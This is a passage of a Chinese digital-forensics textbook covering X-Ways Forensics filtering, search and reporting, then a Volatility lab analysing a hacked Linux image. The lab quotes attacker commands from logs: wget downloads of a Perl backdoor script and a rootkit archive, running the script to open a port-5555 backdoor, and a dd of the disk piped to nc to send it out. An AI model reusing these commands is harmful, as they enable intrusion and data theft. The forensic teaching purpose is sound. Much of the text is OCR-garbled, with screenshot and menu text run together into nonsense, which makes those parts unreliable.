hù)據(jù)。當(dāng)兩個(gè)選項(xiàng)同時(shí)使用時(shí)，可用于設(shè)定一定大小范圍內(nèi)的文件，如圖4-8所示，可過濾文件大小在3KB～1MB范圍內(nèi)的文件。過濾：文件類型激活(c)禁用(D)日口口NOT收縮目錄ExpandAll放棄所有選擇日Emal營Internet由PlainTextTextAWordProcessing+MiscDocumentsDatabaseSpreadsheet,FinancePicturesVidecSound/MusicProgiamsArchiveSourceCode8DiskImageWindowsRegistryWindowsInternalsUnix/LinuxSystemFilesMacOSX/iOSSystemFilesP2FCryptographyFonts其他/未知類型圖4-7按文件類型過濾（4）按文件時(shí)間過濾。X創(chuàng)建時(shí)間：當(dāng)前磁盤中文件和目錄的創(chuàng)建時(shí)間。修改時(shí)間：當(dāng)前磁盤中文件和目錄的最后修改時(shí)間。過港：文件大小<區(qū)激活(C)1MB3KB禁用(D)圖4-8按文件大小過濾訪問時(shí)間：當(dāng)前磁盤中文件和目錄的最后讀取或訪問時(shí)間。記錄更新時(shí)間：在NTFS或Linux文件系統(tǒng)中，文件和目錄的最后修改時(shí)間。刪除時(shí)間：在Linux操作系統(tǒng)中，文件和目錄的冊刪除時(shí)間。例如，按文件修改時(shí)間過濾，如圖4-9所示。（5）按文件屬性過濾。X文件都有自已的屬性，常見文件屬性有A=文檔、H=隱含文件、S=系統(tǒng)文件、P=連接點(diǎn)、C=文件系統(tǒng)級(jí)壓縮、c=壓縮文件中的加密、e!=特定文件類型加密、E=文件系統(tǒng)級(jí)加密、e?=加密可能性較大、T=臨時(shí)文件、O=文件處于脫機(jī)狀態(tài)。以過濾加密文件為例，按文件屬性過濾，如圖4-10所示。過濾創(chuàng)建時(shí)間寵量鼎時(shí)間內(nèi)部創(chuàng)建時(shí)間O百期之前〇日期之片(OR)2003/02/0104:05:06日期之間2003/02/0104:05:06&2003/02/0104:05：06UTC激活(C)禁用(）X過濾：文件屬性e.e.Ee?激活(c)SUID,SGIDSymlinkSpecialFile禁用(D)口提取的郵件口已處理的原始，em郵件口附件或嵌入的數(shù)據(jù)(e-mail)口混合Outlook數(shù)據(jù)口靜止視頻圖像摘錄口虛擬出的附加數(shù)據(jù)口包含子數(shù)據(jù)的文件口文件中的子數(shù)據(jù)呂發(fā)現(xiàn)重復(fù)項(xiàng)目口文件內(nèi)容未知口文件內(nèi)容未知，部分的NOT圖4-9按文件修改時(shí)間過濾步驟3：X-waysForensics軟件同步搜索。?圖4-10按文件屬性過濾用戶可以指定一個(gè)搜索關(guān)鍵詞列表文件，對每行設(shè)定一個(gè)搜索關(guān)鍵詞。發(fā)現(xiàn)的搜索關(guān)鍵詞會(huì)被保存在搜索關(guān)鍵詞列表中或位置管理器中。（1）將所有文件展開或通過過濾選擇需要搜索的文件。(2）若在特定文件中搜索，則需要先選擇文件并添加標(biāo)記，然后在標(biāo)記數(shù)據(jù)中搜索；若在所有文件中搜索，則無須選擇文件，直接選擇在所有數(shù)據(jù)中搜索。（3）單擊“同步搜索”按鈕。（4）輸入關(guān)鍵詞，對每行設(shè)定一個(gè)關(guān)鍵詞，支持空格。（5）選擇字符編碼。（6）選擇搜索方式，搜索方式包括物理搜索、邏輯搜索、在索引中搜索3種，可以根據(jù)具體情況選擇不同的搜索方式。（7）搜索結(jié)束后，顯示所有包含關(guān)鍵詞的搜索結(jié)果。步驟4：生成案件報(bào)告。（1）添加至報(bào)告表。在創(chuàng)建案件報(bào)告前，需要選擇所關(guān)注的文件，然后單擊鼠標(biāo)右鍵，在彈出的快捷菜單中選擇“添加至報(bào)告表”命令。根據(jù)文件內(nèi)容或類別，可以新建報(bào)告表，并將其命名為“關(guān)注的文檔“x地址“x電子郵件”等。只有將文件添加至報(bào)告表后，這些文件才能被包含在案件報(bào)告中。（2）創(chuàng)建案件報(bào)告，如圖4-11所示。X-WaysInvestigator·[分區(qū)1]文件（月編輯（E）攜索(S）查看(M)工具(M專業(yè)工具（)選項(xiàng)（O）蜜口W）創(chuàng)建新件打開案件關(guān)閉案件保存案件男存為(A).件舊檔創(chuàng)建案件報(bào)告打開報(bào)告(R).添加存儲(chǔ)設(shè)備.添加目錄.添加鏡像文件.退出XAlt+F4binDesktop白how2heglibc.2.25gibc2.26libc-databaseDocuments(Ubunta16Ubuntu16，分區(qū)1分區(qū)間隙booneltoor/Desktoplhow2heaplglibe_2.25文件名稱文件stbinduirottlappingchunksanbins3h..ehunks:n安件圖4-11創(chuàng)建案件報(bào)告預(yù)覽詳細(xì)絡(luò)（3）設(shè)置報(bào)告基本信息。設(shè)置“選用報(bào)告頭“選用封面”選用徽章標(biāo)志”等選項(xiàng)內(nèi)容，并勾選“包含報(bào)告表單“項(xiàng)目名稱”復(fù)選框。如果勾選了“包含操作記錄日志”復(fù)選框，則分析過程中標(biāo)識(shí)的所有屏幕畫面圖片、所執(zhí)行的命令及運(yùn)行結(jié)果，都可以被包含在報(bào)告中。具體設(shè)置如圖4-12所示。報(bào)告）因基本報(bào)告選用徽章標(biāo)志L)O左創(chuàng)eO居中國O右側(cè)選用報(bào)告頭(HO左側(cè)e○居中(e]O右側(cè)心選用封面(e)口在選定證措項(xiàng)中接索口包含操作記錄日志國包含時(shí)間日日志中包含屏蒂快照字體大小確定(0)）（4）報(bào)告樣例。取消（）圖4-12生成的報(bào)告樣例為.html格式。3·拓展任務(wù)任務(wù)1?包含報(bào)告表單(T）新建()制除(D).改名(B)以證據(jù)名稱及內(nèi)部標(biāo)識(shí)ID順序?qū)С鑫募园讣夸涳@示順序?qū)С鑫募?每行文件數(shù)字體大小口打印時(shí)在×個(gè)表之后添加分頁符：邊距寬度：D單元格填充口報(bào)告中包含制作文件的副本輸入項(xiàng)目團(tuán)項(xiàng)目名稱單元格最大寬度250設(shè)置報(bào)告基本信息全述用貓速1043幫助(x查找名稱為code的文件，查看其內(nèi)容并計(jì)算哈希值。（提示：code.txt和code.docx存儲(chǔ)于D盤。）任務(wù)2查找創(chuàng)建時(shí)間為2019年1月12日的JPG圖片，其內(nèi)容顯示與手機(jī)有關(guān)，搜索并計(jì)算相應(yīng)的校驗(yàn)值。（提示：設(shè)定檢索范圍。）任務(wù)3【思考】（1）簡要描述X-waysForensics軟件取證分析的一般過程。（2）如何通過X-waysForensics軟件分析注冊表中的常見信息？（3）如何通過X-waysForensics軟件按文件類型過濾證據(jù)？1·實(shí)訓(xùn)目的【實(shí)訓(xùn)16】Volatility取證（1）能夠使用Volatility軟件進(jìn)行簡單取證。（2）了解使用Volatility軟件進(jìn)行取證分析的一般過程。（3）能夠使用Volatility調(diào)查案件、搜索和查找證據(jù)、生成報(bào)告。2·實(shí)訓(xùn)任務(wù)【實(shí)訓(xùn)環(huán)境說明】Linux操作系統(tǒng)、Volatility軟件。實(shí)驗(yàn)平臺(tái)環(huán)境鏈接：/shixuns/6u3ywfeq/challenges任務(wù)【Volatility取證】案例描述：現(xiàn)有一起黑客入侵案件，已對涉案嫌疑人的計(jì)算機(jī)的整個(gè)硬盤進(jìn)行了鏡像，鏡像文件名為ImageFilePC.E01，其MD5值為F8F80C8E757800CEB6D94ADC7BAE84FD。要求通過Volatility軟件的實(shí)訓(xùn)操作進(jìn)行簡單取證，并熟悉使用Volatility軟件調(diào)查案件時(shí)如何創(chuàng)建案例、如何搜索和查找證據(jù)、如何生成報(bào)告，熟悉其主要功能和使用方法。實(shí)訓(xùn)步驟：步驟1：分析鏡像文件（1）首先掛載鏡像mountvictoria-v8.sda1.img-oloop/mnt到/mnt目錄，然后切換到/mnt目錄，可以看到相應(yīng)的系統(tǒng)文件，如圖4-13所示。rooteali:/Desktop/volatility.mastermountvictoria-v8.sda1.img-oloop/mnti:/mnt#fatibmediaoRPEmntsbinLinuxN香srvevalvmlinuz圖4-13相應(yīng)的系統(tǒng)文件contnb（2）在var/log目錄下，可以獲取相應(yīng)的Linux版本信息，如圖4-14所示。圖4-14獲取相應(yīng)的Linux版本信息CRED注意：dmesg命令用于顯示開機(jī)信息，系統(tǒng)內(nèi)核會(huì)將開機(jī)信息存儲(chǔ)在ringbuffer中。若是開機(jī)時(shí)來不及查看信息，則可以通過dmesg命令查看。開機(jī)信息也可以保存在var/log目錄中名稱為dmesg的文件里。步驟2：獲取相應(yīng)的profile文件。方法1：創(chuàng)建自己的profile文件。Volatility軟件自帶一些Windows操作系統(tǒng)的profile文件，而Linux操作系統(tǒng)的profile文件需要自已制作。制作的方法如下：將module.dwarf和system.map打包成一個(gè)zip壓縮文件，然后將zip壓縮文件移動(dòng)到volatility/plugins/overlays/linux/目錄中。Linux操作系統(tǒng)的profile文件是一個(gè)zip壓縮文件。方法2：利用搜索引擎或已公開的profile文件。將公開的項(xiàng)目放入對應(yīng)的volatility/plugins/overlays/linux目錄中?？梢酝ㄟ^pythonvol.py--info來查看并確認(rèn)是否加載profile文件。步驟3：開始分析文件。使用pythonvol.py-f./victoria-v8.memdump.img--profile=Profile的名稱-h命令查看Linux鏡像的命令及相應(yīng)功能介紹。使用pythonvol.py-f./victoria-v8.memdump.img--profile=Profile的名稱linux_psaux命令查看進(jìn)程。使用pythonvol.py-f./victoria-v8.memdump.img--profile=Profile的名稱linux_netstat命令查看各種網(wǎng)絡(luò)相關(guān)信息，如網(wǎng)絡(luò)連接、路由表、接口狀態(tài)等。使用pythonvol.py-f./victoria-v8.memdump.img--profile=Profile的名稱linux_bash命令查看bash的歷史記錄。其中有如下一條記錄，顯示通過scp命令復(fù)制了Exim目錄下的所有文件。scpweng@:/home/weng/temporary/Exim/另外，在/mnt/var/log/Exim目錄下的log文件中看到如下信息。wget/c.pl-0/tmp/c.plwget/rk.tar-0/tmp/rk.tar;sleep1000這兩條命令似乎從下載了內(nèi)容。攻擊者所下載的兩個(gè)文件c.pl和rk.tar，都在/tmp目錄中。通過對c.pl文件的簡單分析表明，它是一個(gè)perl腳本，用于創(chuàng)建一個(gè)c程序，該程序編譯后提供一個(gè)支持SUID的可執(zhí)行文件，并打開一個(gè)后門向攻擊者發(fā)送信息?？梢钥吹剑琧.pl文件被下載，并且編譯的SUID在5555端口中打開了一個(gè)到的連接。wget/c.pl-0/tmp/c.pl;perl/tmp/c.pl5555還可以看到攻擊者的一個(gè)奇怪操作，如圖4-15所示。2042bash3842Bah2011-02-0614:04:46UTC+000028182812488882ifconficddif=/dev圖4-15攻擊者的一個(gè)奇怪操作攻擊者將/dev/sdal完全備份，并通過8888端口發(fā)送出去。sda1..nc192.168.5eEximreject日志顯示將01作為要發(fā)送郵件的主機(jī)IP地址。,和H=()[01]H=(0wned.0rg)[01]H=()[01]使用pythonvol.py-f./victor